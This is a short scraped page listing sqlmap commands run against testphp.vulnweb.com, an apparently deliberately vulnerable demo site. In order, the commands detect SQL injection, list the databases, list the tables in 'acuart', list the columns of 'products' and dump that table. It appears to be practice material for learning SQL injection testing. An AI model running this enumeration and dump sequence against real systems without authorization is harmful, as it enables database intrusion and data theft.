You are on page 1of 2

Python Sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?

cat=1

Python Sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Python Sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables


Python Sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products –
columns

Python Sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products --dump

You might also like